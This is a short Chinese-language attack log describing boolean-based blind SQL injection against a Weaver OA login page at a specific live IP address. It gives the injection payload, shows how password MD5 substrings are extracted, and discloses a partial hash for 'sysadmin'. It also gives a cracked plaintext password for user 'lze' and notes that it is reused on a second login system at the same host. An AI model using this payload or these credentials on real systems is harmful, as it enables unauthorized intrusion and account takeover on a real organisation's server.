泛微的OA
http://60.10.8.227:89/login.do

当输入不存在的用户名时会提示用户未找到(103)
且网页跳转到http://60.10.8.227:89/login.do?message=103&verify=页面
当输入一个存在的用户名时 如sysadmin
会提示错误: 登录密码不正确(102)

用户名输入sysadmin'and'1'='1
提示 登录密码不正确(102)


存在password字段 且长度为32
已知密码为md5加密
这里取9-24位
sysadmin' and substring(password,9,16)='14eb1eac58a1f48f' and 'a' ='a
则sysadmin对应密码的md5为14eb1eac58a1f48f
未解密成功
再来找一个用户
找到一个用户 lze
然后通过上述方法找到密码
经解密是123321
登录提示错误: 用户没有权限登录手机版本(110)
这个系统和http://60.10.8.227:88/login/Login.jsp?logintype=1用户名密码通用
我们使用lze 123321
登录



